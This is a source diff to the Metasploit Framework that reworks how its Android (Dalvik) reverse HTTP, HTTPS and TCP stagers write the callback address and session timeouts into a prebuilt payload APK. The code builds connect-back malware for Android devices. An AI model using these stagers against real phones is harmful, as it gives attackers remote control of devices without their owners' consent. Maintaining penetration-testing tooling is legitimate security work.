Modify the staging process

lib/msf/core/payload/dalvik.rb

@@ -32,8 +32,13 @@ module Msf::Payload::Dalvik
   end
 
   def apply_options(classes)
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['SessionRetryTotal'].to_s)
+    timeouts = [
-    string_sub(classes, 'SSSS                                ', "SSSS" + datastore['SessionRetryWait'].to_s)
+      datastore['SessionExpirationTimeout'].to_s,
+      datastore['SessionCommunicationTimeout'].to_s,
+      datastore['SessionRetryTotal'].to_s,
+      datastore['SessionRetryWait'].to_s
+    ].join('-')
+    string_sub(classes, 'TTTT                                ', 'TTTT' + timeouts)
   end
 
   def string_sub(data, placeholder="", input="")

modules/payloads/stagers/android/reverse_http.rb

@@ -19,12 +19,12 @@ module Metasploit3
     super(merge_info(info,
       'Name'        => 'Dalvik Reverse HTTP Stager',
       'Description' => 'Tunnel communication over HTTP',
-      'Author'        => 'anwarelmakrahy',
+      'Author'      => ['anwarelmakrahy', 'OJ Reeves'],
       'License'     => MSF_LICENSE,
       'Platform'    => 'android',
       'Arch'        => ARCH_DALVIK,
       'Handler'     => Msf::Handler::ReverseHttp,
-      'Stager'        => {'Payload' => ""}
+      'Stager'      => {'Payload' => ''}
     ))
   end
 
@@ -36,13 +36,12 @@ module Metasploit3
       uri_req_len = 5
     end
 
-    lurl = "ZZZZhttp://#{datastore["LHOST"]}"
+    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
-    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    # TODO: perhaps wire in an existing UUID from opts?
-    lurl << "/"
+    url << generate_uri_uuid_mode(:init_java, uri_req_len)
-    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
     apply_options(classes)
 
     jar = Rex::Zip::Jar.new

modules/payloads/stagers/android/reverse_https.rb

@@ -19,12 +19,12 @@ module Metasploit3
     super(merge_info(info,
       'Name'        => 'Dalvik Reverse HTTPS Stager',
       'Description' => 'Tunnel communication over HTTPS',
-      'Author'        => 'anwarelmakrahy',
+      'Author'      => ['anwarelmakrahy', 'OJ Reeves'],
       'License'     => MSF_LICENSE,
       'Platform'    => 'android',
       'Arch'        => ARCH_DALVIK,
       'Handler'     => Msf::Handler::ReverseHttps,
-      'Stager'        => {'Payload' => ""}
+      'Stager'      => {'Payload' => ''}
     ))
   end
 
@@ -36,13 +36,12 @@ module Metasploit3
       uri_req_len = 5
     end
 
-    lurl = "ZZZZhttps://#{datastore["LHOST"]}"
+    url = "https://#{datastore["LHOST"]}:#{datastore["LPORT"]}/"
-    lurl << ":#{datastore["LPORT"]}" if datastore["LPORT"]
+    # TODO: perhaps wire in an existing UUID from opts?
-    lurl << "/"
+    url << generate_uri_uuid_mode(:init_java, uri_req_len)
-    lurl << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, lurl)
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                          datastore['HandlerSSLCert'])

modules/payloads/stagers/android/reverse_tcp.rb

@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
   CachedSize = :dynamic
 
@@ -19,12 +19,12 @@ module Metasploit3
     super(merge_info(info,
       'Name'        => 'Dalvik Reverse TCP Stager',
       'Description' => 'Connect back stager',
-      'Author'		=> 'timwr',
+      'Author'      => ['timwr', 'OJ Reeves'],
       'License'     => MSF_LICENSE,
       'Platform'    => 'android',
       'Arch'        => ARCH_DALVIK,
       'Handler'     => Msf::Handler::ReverseTcp,
-      'Stager'		=> {'Payload' => ""}
+      'Stager'      => {'Payload' => ''}
     ))
   end
 
@@ -37,8 +37,8 @@ module Metasploit3
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
 
-    string_sub(classes, 'XXXX127.0.0.1                       ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
+    url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
-    string_sub(classes, 'YYYY4444                            ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
+    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
     apply_options(classes)
 
     jar.add_file("classes.dex", fix_dex_header(classes))